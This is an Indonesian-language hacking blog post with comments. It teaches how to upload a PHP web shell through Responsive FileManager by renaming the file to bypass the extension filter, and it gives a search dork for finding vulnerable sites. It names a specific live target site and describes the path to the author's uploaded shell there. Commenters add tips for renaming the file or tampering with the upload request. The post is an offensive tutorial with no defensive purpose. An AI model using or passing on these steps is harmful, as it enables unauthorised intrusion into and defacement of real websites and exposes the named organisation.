Responsive FileManager ( RFM ) Inject Filename Upload Shell + Live Target !


=====================================

Oke kali ini gw mau ngasi tau temuan celah terbaru di plugin rfm / Responsive FileManager.
Buat kalian yg dulu deface rfm cuma bisa upload script html doang, skrng ada cara upload shell php nya nih. Oke langsung aja ke tutorialnya...

=====================================

DORK : inurl:/filemanager

=====================================

EXPLOIT :

  • /filemanager/dialog.php
  • bypass atau ubah ekstensi shell dari namashell.php ke namashell.php<?.html


=====================================

LANGKAH - LANGKAH :

  • Dorking dulu dan pilih salah satu target.
  • Live Target : https://www.gem.clinic/template/admin/filemanager/
  • Buka /filemanager/dialog.php.
  • Upload shell yang sudah kalian rename ( namashell.php<?.html )
  • Klik kanan salah satu file, dan pilih Show URL untuk melihat lokasi ke uploadnya, nah kebetulan target saya lokasi ke uploadnya di /assets/user-img/
  • Akses shellnya di "/assets/user/img/namashell.php" 
  • Extensi file .php<?.html akan otomatis ke rename menjadi .php, jadi kalian langsung buka namashell.php aja.
Oke sekian dari saya.

Mau repost artikel? Sertakan sumber nya ya mas heker hehe.

thx to : Jogjakarta Hacker Link, FilthyRoot

Post a Comment

12 Comments

  1. kek mana bang ubah nya file ngasih symbol <?

    ReplyDelete
  2. Gan kok w uda upload terus udah berhasil tuh kann tanda ceklis nah tapi pas w cek ko shell yg w upload gaada ya gan itu bgimana penjelasannya ..

    ReplyDelete
  3. di windows ga bisa rename file jadi <?

    ReplyDelete
    Replies
    1. coba rename pake cmd ( mv file.php file.php<?.html )

      Delete
  4. ga bisa lah di rename kek gitu

    ReplyDelete
  5. coba upload file na gan kalo ada

    ReplyDelete
  6. Ga semua web work ya min?

    ReplyDelete
    Replies
    1. iya, untuk rfm versi terbaru dia ga vuln dgn Exploit itu

      Delete
  7. Buat yang gabisa rename ke shell.php<?.html di android / windows kalian bisa pake tamper data / burpsuite buat rename ke shell.php<?.html pas uploadnya, nanti ter-uploadnya shell.php :)

    ReplyDelete